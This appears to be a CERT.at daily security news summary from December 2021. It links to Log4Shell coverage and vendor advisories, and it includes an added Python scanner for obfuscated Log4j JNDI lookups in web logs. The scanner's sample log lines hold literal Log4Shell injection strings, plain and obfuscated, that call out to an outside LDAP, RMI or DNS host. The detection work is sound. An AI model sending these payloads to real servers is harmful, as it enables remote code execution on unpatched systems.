[CERT-daily] Daily summary - 14.12.2021
Daily end-of-shift report
team at cert.at
Tue Dec 14 19:06:25 CET 2021
=====================
= End-of-Day report =
=====================
Timeframe: Monday 13-12-2021 18:00 - Tuesday 14-12-2021 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
*** News on Log4j ***
---------------------------------------------
Log4j: List of vulnerable products and vendor advisories
https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/
Log4j flaw: BSI gives premature all-clear for consumers
https://www.golem.de/news/log4j-luecke-bsi-gibt-vorschnell-entwarnung-fuer-verbraucher-2112-161797-rss.html
Log4Shell Is Spawning Even Nastier Mutations
https://threatpost.com/apache-log4j-log4shell-mutations/176962/
Log4j: Getting ready for the long haul (CVE-2021-44228), (Tue, Dec 14th)
https://isc.sans.edu/diary/rss/28130
Log4j 2.16.0 improves protection against the Log4Shell flaw
https://heise.de/-6294053
Commentary on Log4j: it works as specified
https://heise.de/-6294476
GitHub's response to the critical Log4j flaw
https://heise.de/-6294120
Security company offers Log4j vaccine for systems that can't be updated immediately
https://www.zdnet.com/article/security-company-offers-log4j-vaccine-for-systems-that-cant-be-updated-immediately/
CISA Creates Webpage for Apache Log4j Vulnerability CVE-2021-44228
https://us-cert.cisa.gov/ncas/current-activity/2021/12/13/cisa-creates-webpage-apache-log4j-vulnerability-cve-2021-44228
The numbers behind a cyber pandemic – detailed dive
https://blog.checkpoint.com/2021/12/13/the-numbers-behind-a-cyber-pandemic-detailed-dive/
Log4Shell (Log4j RCE): Detecting Post-Exploitation Evidence is Best Chance for Mitigation
https://www.intezer.com/blog/cloud-security/log4shell-mitigation/
Log4Shell log4j vulnerability (CVE-2021-44228) - cheat-sheet reference guide
https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/
---------------------------------------------
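Several of the items above concern obfuscated Log4Shell variants ("Nastier Mutations") and post-exploitation detection. As an added example, not code from the report or from any of the linked articles, the following Python scanner reads constructed Apache-style access log lines and collapses Log4j's nested ${lower:}, ${upper:} and ${...:-default} lookups before matching ${jndi:...}, so the evasions that a plain substring match misses are still flagged. The log lines, IP addresses and hosts are constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed Apache-style access log lines (not from the report or any linked article).
# Line 1 is benign; lines 2-5 carry a plain and three obfuscated Log4Shell payloads.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Dec/2021:18:41:02 +0100] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [13/Dec/2021:18:41:07 +0100] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
203.0.113.9 - - [13/Dec/2021:18:42:11 +0100] "GET /?x=${${lower:j}${upper:n}di:${lower:l}dap://198.51.100.7/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"
203.0.113.12 - - [13/Dec/2021:18:43:30 +0100] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7/c}"
203.0.113.14 - - [13/Dec/2021:18:44:02 +0100] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:dns://198.51.100.7/d}"
"""

# A lookup with no further ${...} nested inside it.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# Normalised payload: ${jndi:<scheme>:<target>...}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/*([^/}\s]+)", re.IGNORECASE)
SRC_IP = re.compile(r"^(\S+)\s")


def _resolve(m: "re.Match[str]") -> str:
    """Evaluate one innermost Log4j lookup the way log4j-core would (subset)."""
    body = m.group(1)
    if body.lower().startswith("jndi:"):
        return m.group(0)                  # keep the payload itself for the final match
    if ":-" in body:                       # ${name:-default}, ${::-x}, ${env:NaN:-j}: key unknown, default wins
        return body.split(":-", 1)[1]
    head, sep, arg = body.partition(":")
    if sep and head.lower() == "lower":    # ${lower:X} -> x
        return arg.lower()
    if sep and head.lower() == "upper":    # ${upper:x} -> X
        return arg.upper()
    return m.group(0)                      # unsupported lookup: leave untouched


def normalize(text: str, max_passes: int = 16) -> str:
    """Repeatedly collapse innermost lookups until the string stops changing."""
    for _ in range(max_passes):
        new = INNERMOST.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


@dataclass
class Hit:
    src_ip: str
    scheme: str
    target: str
    raw: str


def scan(log_text: str) -> list[Hit]:
    """Return one Hit per log line that contains a (possibly obfuscated) JNDI lookup."""
    hits = []
    for line in log_text.splitlines():
        m = JNDI.search(normalize(line))
        if not m:
            continue
        ip = SRC_IP.match(line)
        hits.append(Hit(ip.group(1) if ip else "?", m.group(1).lower(), m.group(2), line))
    return hits


def naive_count(log_text: str) -> int:
    """What a plain case-insensitive substring match catches, for comparison."""
    return sum(1 for line in log_text.splitlines() if "${jndi:" in line.lower())


if __name__ == "__main__":
    print(f"naive substring matches: {naive_count(SAMPLE_LOG)}")
    for h in scan(SAMPLE_LOG):
        print(f"{h.src_ip:14} {h.scheme:5} -> {h.target}")
```

On the sample, the substring check sees only the unobfuscated line, while the normalising scanner reports all four callbacks with their scheme (ldap, rmi, dns) and target host, which is what you want to feed into blocking and into a hunt for outbound connections from the logging host. The resolver deliberately keeps a body that already starts with jndi: untouched so an attacker cannot hide the payload behind a trailing :-default.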
*** Anubis Android malware returns to target 394 financial apps ***
---------------------------------------------
The Anubis Android banking malware is now targeting the customers of nearly 400 financial institutions in a new malware campaign.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/anubis-android-malware-returns-to-target-394-financial-apps/
*** Malware and security: Microsoft offers analysis of potentially dangerous drivers ***
---------------------------------------------
Customers can submit drivers to Microsoft via a form. They are first checked automatically and, where needed, by humans.
---------------------------------------------
https://www.golem.de/news/malware-und-security-microsoft-bietet-analyse-potenziell-gefaehrlicher-treiber-an-2112-161780-rss.html
*** Owowa: the add-on that turns your OWA into a credential stealer and remote access panel ***
---------------------------------------------
We found a suspicious binary and determined it to be an IIS module, aimed at stealing credentials and enabling remote command execution from OWA.
---------------------------------------------
https://securelist.com/owowa-credential-stealer-and-remote-access/105219/
*** How Malware Gets On Your Website ***
---------------------------------------------
Almost since the Internet's inception, malware infections have kept pace to be the biggest nuisance a site owner experiences. With an ever-growing number of sites making up the World Wide Web, malware infections only become more common. In this article we'll discuss what malware is, the various types we've come across, the methods used to inject malware into a site, and how you can harden/protect your site against these methods.
---------------------------------------------
https://blog.sucuri.net/2021/12/how-malware-gets-on-your-website.html
*** Dangerous vulnerabilities in the server backup software IBM Spectrum Protect closed ***
---------------------------------------------
Attackers could attack systems running IBM Spectrum Protect and, in the worst case, execute malicious code. Security updates are available.
---------------------------------------------
https://heise.de/-6294287
*** Patch day: critical security vulnerabilities in SAP business software ***
---------------------------------------------
SAP reports 15 security vulnerabilities in its business software for the December patch day. SAP rates many of them as high or even critical risk.
---------------------------------------------
https://heise.de/-6294773
*** Caution when your online acquaintance asks for money ***
---------------------------------------------
You met a man on a dating platform? He is courteous, good-looking and educated too? There is just one catch: he is currently abroad. With your financial support, nothing stands in the way of meeting soon. Warning: you have run into a love scammer!
---------------------------------------------
https://www.watchlist-internet.at/news/vorsicht-wenn-ihre-internetbekanntschaft-um-geld-bittet/
*** Apple releases Android app to find rogue AirTags ***
---------------------------------------------
Apple released an Android app on Monday to help Android users detect malicious nearby AirTag devices that might be used to track them.
---------------------------------------------
https://therecord.media/apple-releases-android-app-to-find-malicious-airtags/
=====================
= Vulnerabilities =
=====================
*** Advisories on the Log4j vulnerability ***
---------------------------------------------
SSA-661247: Apache Log4j Vulnerability (CVE-2021-44228, Log4Shell) - Impact to Siemens Products
https://cert-portal.siemens.com/productcert/txt/ssa-661247.txt
JSA11259
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11259
Vulnerability in Apache Log4j Library
https://www.qnap.com/en-us/security-advisory/QSA-21-58
Apache Log4j Vulnerability
https://support.lenovo.com/product_security/PS500457-APACHE-LOG4J-VULNERABILITY
Security Notice – Statement About Apache Log4j2 Remote Code Execution Vulnerability(CVE-2021-44228)
https://www.huawei.com/en/psirt/security-notices/2021/huawei-sn-20211210-01-log4j2-en
---------------------------------------------
*** Dell driver fix still allows Windows Kernel-level attacks ***
---------------------------------------------
Dell's driver fix for the CVE-2021-21551 vulnerability leaves room for catastrophic BYOVD attacks resulting in Windows kernel driver code execution.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/dell-driver-fix-still-allows-windows-kernel-level-attacks/
*** IBM Security Bulletins ***
---------------------------------------------
Info about Log4Shell in IBM Products, Novalink, WebSphere Application Server, WebSphere MQ for HP NonStop Server, MQ for HP NonStop Server, Tivoli Netcool, Netezza Analytics, Netezza Host Management
---------------------------------------------
https://www.ibm.com/blogs/psirt/
*** Severe security vulnerabilities in iOS and macOS: install Apple updates soon ***
---------------------------------------------
iOS 15.2 and macOS 12.1 fix vulnerabilities that, among other things, allowed a remote jailbreak. Patches for older system versions are partly missing.
---------------------------------------------
https://heise.de/-6294390
*** Security updates for Tuesday ***
---------------------------------------------
Security updates have been issued by Debian (libsamplerate and raptor2), Fedora (pam-u2f and python-markdown2), openSUSE (chromium, fetchmail, ImageMagick, and postgresql10), Oracle (samba), SUSE (fetchmail, postgresql10, python-pip, python3, and sles12sp2-docker-image), and Ubuntu (apache-log4j2, flatpak, glib, and samba).
---------------------------------------------
https://lwn.net/Articles/878629/
*** Advantech R-SeeNet ***
---------------------------------------------
This advisory contains mitigations for SQL Injection, and Improper Privilege Management vulnerabilities in the Advantech R-SeeNet monitoring application.
---------------------------------------------
https://us-cert.cisa.gov/ics/advisories/icsa-21-348-01
*** Schneider Electric Rack PDU ***
---------------------------------------------
This advisory contains mitigations for a Cross-site Scripting vulnerability in Schneider Electric Rack Power Distribution Unit (PDU).
---------------------------------------------
https://us-cert.cisa.gov/ics/advisories/icsa-21-348-02
*** K73710094: XSS vulnerability in undisclosed page of the NGINX Swagger UI ***
---------------------------------------------
https://support.f5.com/csp/article/K73710094
*** ZDI-21-1536: Trend Micro Maximum Security Link Following Denial-of-Service Vulnerability ***
---------------------------------------------
https://www.zerodayinitiative.com/advisories/ZDI-21-1536/
*** ZDI-21-1535: McAfee Database Security Improper Access Control Denial-of-Service Vulnerability ***
---------------------------------------------
https://www.zerodayinitiative.com/advisories/ZDI-21-1535/
*** Siemens Security Advisories ***
---------------------------------------------
SSA-496292: Remote Code Execution Vulnerability in POWER METER SICAM Q100
https://cert-portal.siemens.com/productcert/txt/ssa-496292.txt
SSA-463116: Multiple Access Control Vulnerabilities in Siveillance Identity before
https://cert-portal.siemens.com/productcert/txt/ssa-463116.txt
SSA-400332: Insufficient Design IP Protection in IEEE 1735 Recommended Practice - Impact to Questa and ModelSim
https://cert-portal.siemens.com/productcert/txt/ssa-400332.txt
SSA-396621: Multiple File Parsing Vulnerabilities in JTTK before V10.8.1.1 and JT Utilities before V12.8.1.1
https://cert-portal.siemens.com/productcert/txt/ssa-396621.txt
SSA-390195: LibVNC Vulnerabilities in SIMATIC ITC Products
https://cert-portal.siemens.com/productcert/txt/ssa-390195.txt
SSA-352143: Multiple File Parsing Vulnerabilities in JTTK before V11.0.3.0 and JT Utilities before V13.0.3.0
https://cert-portal.siemens.com/productcert/txt/ssa-352143.txt
SSA-199605: Arbitrary File Download Vulnerability in SIMATIC eaSie PCS 7 Skill Package
https://cert-portal.siemens.com/productcert/txt/ssa-199605.txt
SSA-161331: Scene File Parsing Vulnerability in Simcenter STAR-CCM+ Viewer before V2021.3.1
https://cert-portal.siemens.com/productcert/txt/ssa-161331.txt
SSA-160202: Multiple Access Control Vulnerabilities in SiPass Integrated
https://cert-portal.siemens.com/productcert/txt/ssa-160202.txt
SSA-133772: Zip Path Traversal Vulnerability in Teamcenter Active Workspace
https://cert-portal.siemens.com/productcert/txt/ssa-133772.txt
SSA-523250: Improper Certificate Validation Vulnerability in SINUMERIK Edge
https://cert-portal.siemens.com/productcert/txt/ssa-523250.txt
SSA-595101: Multiple File Parsing Vulnerabilities in JT2Go and Teamcenter Visualization before V13.2.0.5
https://cert-portal.siemens.com/productcert/txt/ssa-595101.txt
SSA-620288: Multiple Vulnerabilities (NUCLEUS:13) in CAPITAL VSTAR
https://cert-portal.siemens.com/productcert/txt/ssa-620288.txt
SSA-802578: Multiple File Parsing Vulnerabilities in JTTK before V11.1.1.0 and JT Utilities before V13.1.1.0
https://cert-portal.siemens.com/productcert/txt/ssa-802578.txt
---------------------------------------------
https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
More information about the Daily mailing list